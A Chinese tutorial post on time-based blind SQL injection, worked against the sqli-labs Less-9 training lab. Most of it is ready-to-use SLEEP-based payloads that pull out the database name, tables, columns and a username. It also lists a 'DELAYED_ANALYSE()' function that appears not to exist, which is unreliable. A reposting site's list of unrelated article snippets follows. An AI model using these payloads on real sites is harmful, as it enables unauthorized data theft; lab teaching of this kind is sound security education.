sql注入之延时注入

1.1 延时盲注原理

延时盲注,也称为时间盲注或延迟注入,是一种SQL盲注的手法。其原理在于利用执行时间差来判断是否执行成功。攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。如果注入成功,执行时间会变长;如果注入失败,执行时间则会变短。

1.2 延时注入靶场

http://192.168.1.24/sqli-labs/Less-9/

1.3 延时注入函数

  1. BENCHMARK()函数

    • 功能:用于测量数据库操作的性能。

    • 攻击用途:可以被攻击者用来制造延时,通过测量执行时间来判断注入是否成功。

  2. SLEEP()函数

    • 功能:让数据库在执行查询时暂停一段时间。

    • 攻击用途:为攻击者提供了延时注入的机会。通过观察查询的响应时间,攻击者可以判断注入语句是否生效,并据此逐步获取敏感信息。

  3. DELAYED_ANALYSE()函数

    • 功能:用于延迟分析查询。

    • 攻击用途:同样可以被利用来进行延时注入攻击

1.4 判断注入点

尝试了N种闭合方式之后发现页面的回显都是一样的并且没有任何报错信息,尝试延时盲注

/?id=1‘ and (sleep(5))--+

确认是延时盲注以及闭合方式是单引号

1.5 猜测数据库名

id=1' and if(length(database())=1,sleep(5),1)--+ #没有延时
id=1' and if(length(database())=2,sleep(5),1)--+ #没有延时
id=1' and if(length(database())=3,sleep(5),1)--+ #没有延时
......
id=1' and if(length(database())=8,sleep(5),1)--+ #延时5秒

数据库名长度为8,使用二分法猜数据库名

id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒
id=1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)--+ #没有延时
......
id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒
id=1' and if(ascii(substr(database(),2,1))=101,sleep(5),1)--+ #延时5秒
id=1' and if(ascii(substr(database(),3,1))=99,sleep(5),1)--+ #延时5秒
id=1' and if(ascii(substr(database(),4,1))=117,sleep(5),1)--+ #延时5秒
id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒
id=1' and if(ascii(substr(database(),6,1))=105,sleep(5),1)--+ #延时5秒
id=1' and if(ascii(substr(database(),7,1))=116,sleep(5),1)--+ #延时5秒
id=1' and if(ascii(substr(database(),8,1))=121,sleep(5),1)--+ #延时5秒
第一个字母ascii码为115,因此第一个字母为's'

得到数据库名为security

1.6 爆破数据库表

#判断表的数量
?id=1' and if((select count(table_name) from information_schema.tables where
table_schema="security")=4,sleep(2),0) --+
...
#判断表名的ASCII码
?id=1' and if(ascii(substr((select table_name from information_schema.tables where
table_schema='security' limit 3,1),1,1))=117,sleep(3),1)--+
?id=1' and if(ascii(substr((select table_name from information_schema.tables where
table_schema='security' limit 3,1),2,1))=115,sleep(3),1)--+
?id=1'and if(ascii(substr((select table_name from information_schema.tables where
table_schema='security' limit 3,1),3,1))=101,sleep(3),1)--+
?id=1' and if(ascii(substr((select table_name from information_schema.tables where
table_schema='security' limit 3,1),4,1))=114,sleep(3),1)--+
?id=1'and if(ascii(substr((select table_name from information_schema.tables where
table_schema='security' limit 3,1),5,1))=115,sleep(3),1)--+

1.7 爆破字段

#判断有多少列
?id=1' and if((select count(column_name) from information_schema.columns where
table_schema="security" and table_name="users")=3,sleep(5),0)--+
​
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),1,1))=117,sleep(5),1)--+
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),2,1))=115,sleep(5),1)--+
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),3,1))=101,sleep(5),1)--+
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),4,1))=114,sleep(5),1)--+
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),5,1))=110,sleep(5),1)--+
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),6,1))=97,sleep(5),1)--+
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),7,1))=109,sleep(5),1)--+
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),8,1))=101,sleep(5),1)--+

1.8 爆破值

?id=1' and If(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),1)--+

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/309963.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2024年生物医学与食品安全国际会议 (ICBFS 2024)

2024年生物医学与食品安全国际会议 (ICBFS 2024) 2024 International Conference on Environmental Prevention and New Materials 【会议简介】 2024年生物医学与食品安全国际会议即将在成都召开。本次会议将汇聚全球生物医学与食品安全领域的专家学者&#xff0c;共同探讨生…

CSS导读 (元素显示模式 下)

&#xff08;大家好&#xff0c;今天我们将继续来学习CSS的相关知识&#xff0c;大家可以在评论区进行互动答疑哦~加油&#xff01;&#x1f495;&#xff09; 目录 3.6 元素显示模式转换 3.7 (一个小技巧)单行文字垂直居中的代码 3.8 单行文字垂直居中的原理 3.9 小案例…

学习笔记------约束的管理

此篇记录FPGA的静态时序分析&#xff0c;在学习FPGA的过程中&#xff0c;越发觉得对于时序约束只是懂了个皮毛。现在记录一下自己的学习过程。 本文摘自《VIVADO从此开始》高亚军 为什么要进行约束&#xff1f;约束的目的是什么&#xff1f; 简单来说&#xff0c;就是需要在…

提高APP安全性的必备加固手段——深度解析代码混淆技术

​ APP 加固方式 iOSAPP 加固是优化 APK 安全性的一种方法&#xff0c;常见的加固方式有混淆代码、加壳、数据加密、动态加载等。下面介绍一下 iOSAPP 加固的具体实现方式。 混淆代码&#xff1a; 使用 ProGuard 工具可以对代码进行混淆&#xff0c;使得反编译出来的代码很难…

数据结构复习指导之绪论(算法的概念以及效率的度量)

文章目录 绪论&#xff1a; 2.算法和算法评价 知识总览 2.1算法的基本概念 知识点回顾与重要考点 2.2算法效率的度量 知识总览 1.时间复杂度 2.空间复杂度 知识点回顾与重要考点 归纳总结 绪论&#xff1a; 2.算法和算法评价 知识总览 2.1算法的基本概念 算法( Al…

端口协议(爆破、未授权)

常见端口服务及攻击方向&#xff1a; 弱口令爆破 工具&#xff1a;https://github.com/vanhauser-thc/thc-hydra hydra是一个支持多协议的自动化的爆破工具。 支持的服务、协议&#xff1a; telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-…

Java基础-知识点04(面试|学习)

Java基础-知识点04 Object类wait和notify需要在什么地方使用&#xff1f;说明 toString() 方法的作用和重写时的注意事项。toString() 方法在实际开发中的应用场景和作用。 continue、break 和 return 的区别1、continue&#xff1a;2、break&#xff1a;3、return&#xff1a;…

HarmonyOS NEXT星河版之实战知乎App评论功能

文章目录 一、目标完成页面二、实战2.1 定义数据2.2 mock数据2.3 封装顶部标题栏2.4 封装评论Item2.5 定义回复组件2.6 主页面 三、小结 一、目标完成页面 二、实战 2.1 定义数据 export interface ReplyItem {avatar: ResourceStr // 头像author: string // 作者id: number …

Python和Java哪个更适合后端开发?

Python和Java都是强大的后端开发语言&#xff0c;它们各自有鲜明的特点和适用场景。选择哪一个更适合后端开发&#xff0c;主要取决于具体的项目需求、团队技术栈、个人技能偏好以及长期发展考虑等因素。 下面是两者在后端开发中的优势和劣势&#xff1a; 「Python&#xff1…

【vue】defineProps 传数据 父传子

先行知识 【vue】导入组件 传值过程 App.vue <template><Header name"1234567890" url"https://www.1234567890.com" /><hr><!-- <Footer v-bind"propsWeb" /> --><Footer :"propsWeb" /><h…

ETL中如何运用好MQ消息集成

一、ETL的主要作用 ETL&#xff08;Extract, Transform, Load&#xff09;是数据仓库中的关键环节&#xff0c;其主要作用是将数据从源系统中抽取出来&#xff0c;经过转换和清洗后加载到数据仓库中。具体而言&#xff1a; Extract&#xff08;抽取&#xff09;&#xff1a;从…

Python | Leetcode Python题解之第24题两两交换链表中的节点

题目&#xff1a; 题解&#xff1a; class Solution:def swapPairs(self, head: ListNode) -> ListNode:dummyHead ListNode(0)dummyHead.next headtemp dummyHeadwhile temp.next and temp.next.next:node1 temp.nextnode2 temp.next.nexttemp.next node2node1.next…

2024年制冷设备行业现状分析

环洋咨询Global Info Research的制冷设备市场调研报告提供制冷设备市场的基本概况&#xff0c;包括定义&#xff0c;分类&#xff0c;应用和产业链结构&#xff0c;同时还讨论发展政策和计划以及制造流程和成本结构&#xff0c;分析制冷设备市场的发展现状与未来市场趋势&#…

探索分布式技术--------------注册中心zookeeper

目录 一、ZooKeeper是什么 二、ZooKeeper的工作机制 三、ZooKeeper特点 四、ZooKeeper数据结构 五、ZooKeeper应用场景 5.1统一命名服务 5.2统一配置管理 5.3统一集群管理 5.4服务器动态上下线 5.5软负载均衡 六、ZooKeeper的选举机制 6.1第一次启动选举机制 6.2非…

鸿蒙应用开发之搜索框组件

前面学习了滚动组件,现在来学习搜索框组件。 这个搜索框组件,其实比较像探索网站的输入,可以输入内容,并且带有一个搜索的按钮。不过,这个组件还是缺少了一个搜索输入历史提示,或者说是输入内容动态提示的功能,这个还需要开发人员自己来完善这个功能。 这个搜索框大体如…

深度学习入门(3)

一、感知机 感知机接收多个输入信号&#xff0c;输出一个信号。这里所说的“信号”可以想象成电流或河流那样具备“流动性”的东西。 但是&#xff0c;和实际的电 流不同的是&#xff0c;感知机的信号只有“流 / 不流”&#xff08; 1 / 0 &#xff09;两种取值。在本书中&…

Itasca pfc3d/3dec/flac3d/massflow 9.0 授权

所有 Itasca 软件都建立在每个程序基础的共同元素层之上——无论程序使用何种数值方法或元素。因此&#xff0c;无论是使用 DEM 软件&#xff08;如 3DEC 或 PFC&#xff09;&#xff0c;还是使用 FLAC3D 等连续体软件&#xff0c;都会有许多流程、实用程序和功能是所有这些软件…

2011年认证杯SPSSPRO杯数学建模B题(第二阶段)生物多样性的评估全过程文档及程序

2011年认证杯SPSSPRO杯数学建模 B题 生物多样性的评估 原题再现&#xff1a; 2010 年是联合国大会确定的国际生物多样性年。保护地球上的生物多样性已经越来越被人类社会所关注&#xff0c;相关的大规模科研和考察计划也层出不穷。为了更好地建立国际交流与专家间的合作&…

【论文速读】| CovRL:基于覆盖引导的强化学习对LLM基础变异进行JavaScript引擎模糊测试

本次分享论文为&#xff1a;CovRL: Fuzzing JavaScript Engines with Coverage-Guided Reinforcement Learning for LLM-based Mutation 基本信息 原文作者&#xff1a;Jueon Eom, Seyeon Jeong, Taekyoung Kwon 作者单位&#xff1a;延世大学、苏瑞软科技公司 关键词&#…

ubuntu或类Debian获取某些包的离线版本-包括依赖(还有一些意想不到的用途,哈哈)

前言 偶尔能碰到很特殊的情况。网址白名单&#xff0c;纯内网&#xff0c;超多依赖及一些很难描述的场景。 比如一些少见的发行版缺少某些包。这时候可以找一台类似的系统环境来下载离线包及 其依赖包&#xff0c;然后转移到内网进行安装。如果是网址白名单&#xff0c;或者纯内…